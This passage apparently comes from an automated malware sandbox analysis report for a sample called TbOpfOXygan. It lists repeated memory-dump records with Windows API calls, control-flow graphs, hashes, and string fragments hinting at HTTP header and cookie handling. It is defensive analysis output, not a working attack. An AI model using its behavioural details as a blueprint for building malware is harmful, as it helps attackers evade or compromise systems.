              • Instruction Fuzzy Hash: DC01E830640209BFEF119FA0CC45B9D7AB4FF04B04F1041A8BA54F91E1DB70AA609B58
              APIs
              • CreateFileA.KERNEL32(00100000,40000000,00000003,00000000,?,00000080,00000000,00100000), ref: 001D275C
              • SetFilePointer.KERNEL32(00000002,00000000,00000000,00000002), ref: 001D2779
              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 001D2795
              • CloseHandle.KERNEL32(?), ref: 001D27A6
              Memory Dump Source
              • Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_1d0000_bin.jbxd
              Similarity
              • API ID: File$CloseCreateHandlePointerWrite
              • String ID:
              • API String ID: 3604237281-0
              • Opcode ID: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
              • Instruction ID: d1ccf6eb2e197ffd407da2cf2dcbfe60f97cb7de1ec77d81d8a1953d9b4a7ab3
              • Opcode Fuzzy Hash: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
              • Instruction Fuzzy Hash: CC01F630640209BFEF219FA0DC45F8E7EB5BF14B14F2041A9FA14BD1E5D771AA20AB54
              APIs
              • GetModuleHandleA.KERNEL32(00000000,00000000,?,008B3FF8,0000000A,?,00000000,0000000A), ref: 008B4022
              • Sleep.KERNEL32(000003E8,00000000,?,008B3FF8,0000000A,?,00000000,0000000A), ref: 008B4044
              • Sleep.KERNEL32(000007D0), ref: 008B4054
              • Sleep.KERNEL32(00000BB8), ref: 008B4064
              Memory Dump Source
              • Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_8b0000_bin.jbxd
              Similarity
              • API ID: Sleep$HandleModule
              • String ID:
              • API String ID: 3646095425-0
              • Opcode ID: 2260b28b3e21410e304e733389a9bb5d28d906a68a869efffc2975d072b34b11
              • Instruction ID: 2a8e48ff86266592664ea9304e6b2ed0443d8bdbd670ca7a70a24d3d99257ae1
              • Opcode Fuzzy Hash: 2260b28b3e21410e304e733389a9bb5d28d906a68a869efffc2975d072b34b11
              • Instruction Fuzzy Hash: 68F05870444640DAEB907FB8888B7983AA8FF10305F001090BB4AEE697CF7041808E77

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 214097f-21409a0 call 2140d05 call 2141506 call 2143dc8 8 21409a8-21409ca 0->8 10 21409d0-2140a29 call 2140a1a call 214375b 8->10 11 2140b32-2140b33 8->11 19 2140b2d call 2140b34 10->19 20 2140a2f-2140a51 10->20 19->11 20->19 23 2140a57-2140a7c 20->23 23->19 25 2140a82-2140ac1 23->25 25->19 27 2140ac3-2140aef 25->27 27->19 29 2140af1-2140afd 27->29 31 2140b02-2140b26 29->31 31->11 34 2140b28-2140b2b 31->34 34->19 34->31
              Memory Dump Source
              • Source File: 00000023.00000002.3364155195.0000000002140000.00000040.00000001.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_2140000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction ID: c7c993d1c5668a210b8ff73b5b5b6419dd4ffa9bbc27daaa090734784bb80bb0
              • Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction Fuzzy Hash: 1A416E71680218AFEB269F60CC85FA973ACEF44744F1401A5BB49FE0D5DB70A690CE69

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 35 2141386-2141393 36 2141435-2141436 35->36 37 2141399-214139f 35->37 37->36 38 21413a5-21413bb 37->38 38->36 40 21413bd-21413d0 38->40 42 21413d2-21413d9 40->42 43 21413dc-21413ec call 2140ebd 42->43 46 21413ee-21413fc 43->46 47 2141401-214142c 46->47 48 21413fe 46->48 47->36 48->47
              Memory Dump Source
              • Source File: 00000023.00000002.3364155195.0000000002140000.00000040.00000001.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_2140000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction ID: 93b9765c5316faf66b292318dc333d7b0adcafc065bd61f928e3e4fbfe6d0242
              • Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction Fuzzy Hash: 40219D71A4021AAFDB11DF78C848B9DBBB5AF04714F498225F959BF2D0EB70E811CB94

              Control-flow Graph

              Memory Dump Source
              • Source File: 00000023.00000002.3364155195.0000000002140000.00000040.00000001.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_2140000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0a0e7f0d646b88fd6e9b71376c3a42f9967952cb2f02f24ce030c4017fa39755
              • Instruction ID: e65ade6c102ae6075eef00eb2b9b101081450e0f56294fc1d504775b0ed55cb0
              • Opcode Fuzzy Hash: 0a0e7f0d646b88fd6e9b71376c3a42f9967952cb2f02f24ce030c4017fa39755
              • Instruction Fuzzy Hash: 4D117D72404514AEDF03AF60C5C4CAA73EDAF40718B45096A9D8DEE449EF749194CEE5

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 67 21409a8-21409ca 69 21409d0-2140a29 call 2140a1a call 214375b 67->69 70 2140b32-2140b33 67->70 78 2140b2d call 2140b34 69->78 79 2140a2f-2140a51 69->79 78->70 79->78 82 2140a57-2140a7c 79->82 82->78 84 2140a82-2140ac1 82->84 84->78 86 2140ac3-2140aef 84->86 86->78 88 2140af1-2140afd 86->88 90 2140b02-2140b26 88->90 90->70 93 2140b28-2140b2b 90->93 93->78 93->90
              Memory Dump Source
              • Source File: 00000023.00000002.3364155195.0000000002140000.00000040.00000001.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_2140000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
              • Instruction ID: eceb741a300765d93ad57afd17393b7056e720060e8ea9c703c96a8cc2c074f3
              • Opcode Fuzzy Hash: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
              • Instruction Fuzzy Hash: EA014471644318AFEB22DE50CC81FAA73FCEF44B04F500195BB49EE0C5EAB065808AD9

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 94 2143fde-2143ffa call 214375b call 21438a7 99 214400c-214403b call 214404d * 3 94->99 100 2143ffc-214400a call 214411e 94->100 113 2144046 99->113 107 214404b-214404c 100->107 113->107 114 2144046 call 214404d 113->114 114->107
              Memory Dump Source
              • Source File: 00000023.00000002.3364155195.0000000002140000.00000040.00000001.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_2140000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
              • Instruction ID: d2508506a3db3d0b0c18c91c355d6a00c47bf7d728c49fa506ae27a218957f68
              • Opcode Fuzzy Hash: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
              • Instruction Fuzzy Hash: D2F039705C8280EFFB507BB08C89B8D36A99F01709F0400A0EA4EBF495CF78A4608E72

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 115 21447f7-2144810 call 2143b24 118 2144820-2144850 115->118 119 2144812-214481b call 2143b76 115->119 122 2144856-2144878 118->122 123 214496a-214496f 118->123 119->118 122->123 125 214487e-21448a3 122->125 127 21448a5-21448ba 125->127 128 21448bb-21448dd 125->128 127->128 130 2144942-214494c 128->130 131 21448df-2144901 128->131 132 2144963-2144968 130->132 133 214494e-2144960 call 214377b 130->133 131->130 137 2144903-2144925 131->137 132->123 133->132 137->130 139 2144927-214493f 137->139 139->130
              Strings
              Memory Dump Source
              • Source File: 00000023.00000002.3364155195.0000000002140000.00000040.00000001.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_2140000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID: -Age$Cook$User$ie: $nt:
              • API String ID: 0-2052191038
              • Opcode ID: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
              • Instruction ID: adabfec2d64ebd25c9d5dc5d14b8915bc2a4d16170666a7d849a224e19db2130
              • Opcode Fuzzy Hash: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
              • Instruction Fuzzy Hash: 514197B2600208BFEF129F64CC44BDEBBB9FF84744F154069EA48AB154DB709650DF94

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 140 21447f8-2144803 141 214480e-2144810 140->141 142 2144809 call 2143b24 140->142 143 2144820-2144850 141->143 144 2144812-214481b call 2143b76 141->144 142->141 147 2144856-2144878 143->147 148 214496a-214496f 143->148 144->143 147->148 150 214487e-21448a3 147->150 152 21448a5-21448ba 150->152 153 21448bb-21448dd 150->153 152->153 155 2144942-214494c 153->155 156 21448df-2144901 153->156 157 2144963-2144968 155->157 158 214494e-2144960 call 214377b 155->158 156->155 162 2144903-2144925 156->162 157->148 158->157 162->155 164 2144927-214493f 162->164 164->155
              Strings
              Memory Dump Source
              • Source File: 00000023.00000002.3364155195.0000000002140000.00000040.00000001.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_35_2_2140000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID: -Age$Cook$User$ie: $nt:
              • API String ID: 0-2052191038
              • Opcode ID: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
              • Instruction ID: cd0353496c0f2450ad69fd81f348745bb0e3df0aadd2fd28c0a9f6ec12291bb7
              • Opcode Fuzzy Hash: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
              • Instruction Fuzzy Hash: 304173B2600208BFEF129F64CC48BDEBBB9FF84744F154069EA48AB154DB709650DF94

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 73097f-7309a0 call 730d05 call 731506 call 733dc8 8 7309a8-7309ca 0->8 10 730b32-730b33 8->10 11 7309d0-730a29 call 730a1a call 73375b 8->11 19 730a2f-730a51 11->19 20 730b2d call 730b34 11->20 19->20 23 730a57-730a7c 19->23 20->10 23->20 25 730a82-730ac1 23->25 25->20 27 730ac3-730aef 25->27 27->20 29 730af1-730afd 27->29 31 730b02-730b26 29->31 31->10 34 730b28-730b2b 31->34 34->20 34->31
              Memory Dump Source
              • Source File: 00000024.00000002.3357178888.0000000000730000.00000040.00000001.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_36_2_730000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction ID: 6728ae20252ac2ffc0d6d814f5434eda735160c7bbe769ca22c6a962560125ae
              • Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction Fuzzy Hash: 3C413071640258AFFB229F60CC85FA977ACEF44744F040195BA49FE0D6DB709A90CBA5

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 35 731386-731393 36 731435-731436 35->36 37 731399-73139f 35->37 37->36 38 7313a5-7313bb 37->38 38->36 40 7313bd-7313d0 38->40 42 7313d2-7313d9 40->42 43 7313dc-7313ec call 730ebd 42->43 46 7313ee-7313fc 43->46 47 731401-73142c 46->47 48 7313fe 46->48 47->36 48->47
              Memory Dump Source
              • Source File: 00000024.00000002.3357178888.0000000000730000.00000040.00000001.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_36_2_730000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction ID: cf8747c9e175c82e3595506a3fc25339bd8b5495f2739ec13f08a5264b2285e3
              • Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction Fuzzy Hash: 57219D31A04256AFEB12DF78C849B9DBBB5AF04710F458325F955AF2D2E770A810CB94

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 49 731528-7315d4 call 73375b call 730cdd call 731386 * 6 66 7315d9-7315da 49->66
              Memory Dump Source
              • Source File: 00000024.00000002.3357178888.0000000000730000.00000040.00000001.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_36_2_730000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e0864a1ffd4af814af69d585a361cf04dd1537266d27de3667db18be38832b11
              • Instruction ID: b3ab5c32b568e308afb12959dcd869da6819acf2cfa87e916cd5dd211453e5fc
              • Opcode Fuzzy Hash: e0864a1ffd4af814af69d585a361cf04dd1537266d27de3667db18be38832b11
              • Instruction Fuzzy Hash: F2115CB2404514EEEF03AF60D5C9CAA73ECEE40704F450A6AAD89EF44AEF749154CAE5

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 67 7309a8-7309ca 69 730b32-730b33 67->69 70 7309d0-730a29 call 730a1a call 73375b 67->70 78 730a2f-730a51 70->78 79 730b2d call 730b34 70->79 78->79 82 730a57-730a7c 78->82 79->69 82->79 84 730a82-730ac1 82->84 84->79 86 730ac3-730aef 84->86 86->79 88 730af1-730afd 86->88 90 730b02-730b26 88->90 90->69 93 730b28-730b2b 90->93 93->79 93->90
              Memory Dump Source
              • Source File: 00000024.00000002.3357178888.0000000000730000.00000040.00000001.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_36_2_730000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
              • Instruction ID: 614c5b5ccd998a654a4c780d553a4103c60e12a18bc5a98ee2d52576ce57b3c8
              • Opcode Fuzzy Hash: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
              • Instruction Fuzzy Hash: 21014471644318AFEB12DE50CC86FAA73FCEF44B04F500195BB49EE0C6EAB065808AD9

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 94 733fde-733ffa call 73375b call 7338a7 99 73400c-73403b call 73404d * 3 94->99 100 733ffc-73400a call 73411e 94->100 113 734046 99->113 107 73404b-73404c 100->107 113->107 114 734046 call 73404d 113->114 114->107
              Memory Dump Source
              • Source File: 00000024.00000002.3357178888.0000000000730000.00000040.00000001.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_36_2_730000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b6894170d7038a3f9f967b47c80f72c41a6d0015feba2888870859869def464f
              • Instruction ID: b1b935ce2fafb03b58fa4389c324c2747015a627abd8f3e759ef64808e641e6c
              • Opcode Fuzzy Hash: b6894170d7038a3f9f967b47c80f72c41a6d0015feba2888870859869def464f
              • Instruction Fuzzy Hash: 7BF01C706482A0D6FB687BA08C8EB4D36A89F01709F0400D1BB49AE597CE7C65509E72

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 115 7347f7-734810 call 733b24 118 734812-73481b call 733b76 115->118 119 734820-734850 115->119 118->119 122 734856-734878 119->122 123 73496a-73496f 119->123 122->123 125 73487e-7348a3 122->125 127 7348a5-7348ba 125->127 128 7348bb-7348dd 125->128 127->128 130 734942-73494c 128->130 131 7348df-734901 128->131 132 734963-734968 130->132 133 73494e-734960 call 73377b 130->133 131->130 136 734903-734925 131->136 132->123 133->132 136->130 139 734927-73493f 136->139 139->130
              Strings
              Memory Dump Source
              • Source File: 00000024.00000002.3357178888.0000000000730000.00000040.00000001.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_36_2_730000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID: -Age$Cook$User$ie: $nt:
              • API String ID: 0-2052191038
              • Opcode ID: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
              • Instruction ID: 7e55dad708bbd16c49a3e5a30327107e0ffe9593964e7d266f069c1e140af78a
              • Opcode Fuzzy Hash: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
              • Instruction Fuzzy Hash: 7B4186B2600208BFFF129F64CC48BDEBBB9FF84744F154059EA44AB155DB74AA50CB94

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 140 7347f8-734803 141 73480e-734810 140->141 142 734809 call 733b24 140->142 143 734812-73481b call 733b76 141->143 144 734820-734850 141->144 142->141 143->144 147 734856-734878 144->147 148 73496a-73496f 144->148 147->148 150 73487e-7348a3 147->150 152 7348a5-7348ba 150->152 153 7348bb-7348dd 150->153 152->153 155 734942-73494c 153->155 156 7348df-734901 153->156 157 734963-734968 155->157 158 73494e-734960 call 73377b 155->158 156->155 161 734903-734925 156->161 157->148 158->157 161->155 164 734927-73493f 161->164 164->155
              Strings
              Memory Dump Source
              • Source File: 00000024.00000002.3357178888.0000000000730000.00000040.00000001.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_36_2_730000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID: -Age$Cook$User$ie: $nt:
              • API String ID: 0-2052191038
              • Opcode ID: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
              • Instruction ID: b6663230ded7339e09aeeb9839e7960aa7e2bb3dd6665906f0b4b873e5046d2d
              • Opcode Fuzzy Hash: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
              • Instruction Fuzzy Hash: BC4174B2600208BFFF129F64CC48BDEBBB9FF84744F154059EA44AB255DB74AA50CB94

              Control-flow Graph

              Memory Dump Source
              • Source File: 00000025.00000002.3360211551.0000000000B10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_37_2_b10000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction ID: 11400e8cc1f12aa549bf9633ea7376086a2350317d109eab637b56ed2955b1aa
              • Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction Fuzzy Hash: 88416371544214AFEB12AF60CC85FAA73FCEF44744F4401D5BA49FE0D6DAB0AAD0CA65

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 15 b11386-b11393 16 b11435-b11436 15->16 17 b11399-b1139f 15->17 17->16 18 b113a5-b113bb 17->18 18->16 20 b113bd-b113d0 18->20 22 b113d2-b113d9 20->22 23 b113dc-b113ec call b10ebd 22->23 26 b113ee-b113fc 23->26 27 b11401-b1142c 26->27 28 b113fe 26->28 27->16 28->27
              Memory Dump Source
              • Source File: 00000025.00000002.3360211551.0000000000B10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_37_2_b10000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction ID: 0e9a6d9ce4918557d1b7b7339c189ed6dcdef0c9ddec74412b3624f778cb9024
              • Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction Fuzzy Hash: 2E21CD31900226AFDB11DF78C848B9CBBF5AF04710F458265FA64AF2D0E770A910CB94

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 29 b11528-b115d4 call b1375b call b10cdd call b11386 * 6 46 b115d9-b115da 29->46
              Memory Dump Source
              • Source File: 00000025.00000002.3360211551.0000000000B10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_37_2_b10000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1482415ca05b5c8e1457f3df7d068783956965e22d146909a8465ff1723fab8c
              • Instruction ID: 4ec691ced5890e4daf8895eb722ad0c1176e2868efd7ccd0add5ec4f8af0e36c
              • Opcode Fuzzy Hash: 1482415ca05b5c8e1457f3df7d068783956965e22d146909a8465ff1723fab8c
              • Instruction Fuzzy Hash: 1711C1B2404514AEDF03BF20D5C4CEA73ECEE40704B450AAAAD95EF44EEF709194CAE9

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 47 b109a8-b109ca 49 b109d0-b10a14 call b10a1a 47->49 50 b10b32-b10b33 47->50 49->50
              Memory Dump Source
              • Source File: 00000025.00000002.3360211551.0000000000B10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_37_2_b10000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
              • Instruction ID: 352594f392fedd469c8614d5a9ed25ab75da584b5a63bd9943c1a773f022acbb
              • Opcode Fuzzy Hash: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
              • Instruction Fuzzy Hash: B601F471644318AFEB12DE50CC86FAA73FCEF54B04F500595BB49EE0C5EAB06584CAD9

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 54 b13fde-b13ffa call b1375b call b138a7 59 b1400c-b1403b call b1404d * 3 54->59 60 b13ffc-b1400a call b1411e 54->60 73 b14046 59->73 68 b1404b-b1404c 60->68 73->68 74 b14046 call b1404d 73->74 74->68
              Memory Dump Source
              • Source File: 00000025.00000002.3360211551.0000000000B10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_37_2_b10000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
              • Instruction ID: dc6b8c3d51021caca117eafab4c4dda3fab1dff4ebd9c551559c9057c77a4bbf
              • Opcode Fuzzy Hash: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
              • Instruction Fuzzy Hash: 38F01C70548280D6EB507BB18C8EBCD36E89F05709F8804D0BB4ABE496CF7845D09E72

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 75 b147f7-b14810 call b13b24 78 b14820-b14850 75->78 79 b14812-b1481b call b13b76 75->79 82 b14856-b14878 78->82 83 b1496a-b1496f 78->83 79->78 82->83 85 b1487e-b148a3 82->85 87 b148a5-b148ba 85->87 88 b148bb-b148dd 85->88 87->88 90 b14942-b1494c 88->90 91 b148df-b14901 88->91 92 b14963-b14968 90->92 93 b1494e-b14960 call b1377b 90->93 91->90 96 b14903-b14925 91->96 92->83 93->92 96->90 99 b14927-b1493f 96->99 99->90
              Strings
              Memory Dump Source
              • Source File: 00000025.00000002.3360211551.0000000000B10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_37_2_b10000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID: -Age$Cook$User$ie: $nt:
              • API String ID: 0-2052191038
              • Opcode ID: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
              • Instruction ID: f955f5db41eb90c3e4f90717f6cc859c747c3fbfeaeccf2e51149c4120cf9a6b
              • Opcode Fuzzy Hash: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
              • Instruction Fuzzy Hash: D44186B2600208BFEF129F64CC44BDEBBF9FF84744F154099EA44AB154DB709A90CB94

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 100 b147f8-b14803 101 b1480e-b14810 100->101 102 b14809 call b13b24 100->102 103 b14820-b14850 101->103 104 b14812-b1481b call b13b76 101->104 102->101 107 b14856-b14878 103->107 108 b1496a-b1496f 103->108 104->103 107->108 110 b1487e-b148a3 107->110 112 b148a5-b148ba 110->112 113 b148bb-b148dd 110->113 112->113 115 b14942-b1494c 113->115 116 b148df-b14901 113->116 117 b14963-b14968 115->117 118 b1494e-b14960 call b1377b 115->118 116->115 121 b14903-b14925 116->121 117->108 118->117 121->115 124 b14927-b1493f 121->124 124->115
              Strings
              Memory Dump Source
              • Source File: 00000025.00000002.3360211551.0000000000B10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_37_2_b10000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID: -Age$Cook$User$ie: $nt:
              • API String ID: 0-2052191038
              • Opcode ID: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
              • Instruction ID: 1df51df52038f82e0c92cfb7e0a6ecaca71ee7056ea8779aca579818ef17aaf9
              • Opcode Fuzzy Hash: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
              • Instruction Fuzzy Hash: 534183B2600208BFEF129F64CC48BDEBBF9FF84744F554098EA44AB154DB709A90CB94

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 268097f-26809a0 call 2680d05 call 2681506 call 2683dc8 8 26809a8-26809ca 0->8 10 26809d0-2680a29 call 2680a1a call 268375b 8->10 11 2680b32-2680b33 8->11 19 2680b2d call 2680b34 10->19 20 2680a2f-2680a51 10->20 19->11 20->19 23 2680a57-2680a7c 20->23 23->19 25 2680a82-2680ac1 23->25 25->19 27 2680ac3-2680aef 25->27 27->19 29 2680af1-2680afd 27->29 31 2680b02-2680b26 29->31 31->11 34 2680b28-2680b2b 31->34 34->19 34->31
              Memory Dump Source
              • Source File: 00000026.00000002.3362395547.0000000002680000.00000040.00000001.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_38_2_2680000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction ID: 72dc720698b2794f63435ebb207db0363640884a6835be0fff738a30095c3abe
              • Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
              • Instruction Fuzzy Hash: 7C418171640254AFEF12AF60CC85FA973BCEF04B04F040695BA49FE1D5DBB09694CE65

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 35 2681386-2681393 36 2681399-268139f 35->36 37 2681435-2681436 35->37 36->37 38 26813a5-26813bb 36->38 38->37 40 26813bd-26813d0 38->40 42 26813d2-26813d9 40->42 43 26813dc-26813ec call 2680ebd 42->43 46 26813ee-26813fc 43->46 47 26813fe 46->47 48 2681401-268142c 46->48 47->48 48->37
              Memory Dump Source
              • Source File: 00000026.00000002.3362395547.0000000002680000.00000040.00000001.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_38_2_2680000_TbOpfOXygan.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction ID: dd0d93ff733648c15ec1a33c597e6b15f695fd31b448c3f0cf58c9779e4c7fd8
              • Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
              • Instruction Fuzzy Hash: 24219D31900216AFDB11EF78C848B9DBBB5AF05714F058365F999BF2D0E770A812CB94

              Control-flow Graph

              Memory Dump Source
              • Source File: 00000026.00000002.3362395547.0000000002680000.00000040.00000001.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_38_2_2680000_TbOpfOXygan.jbxd
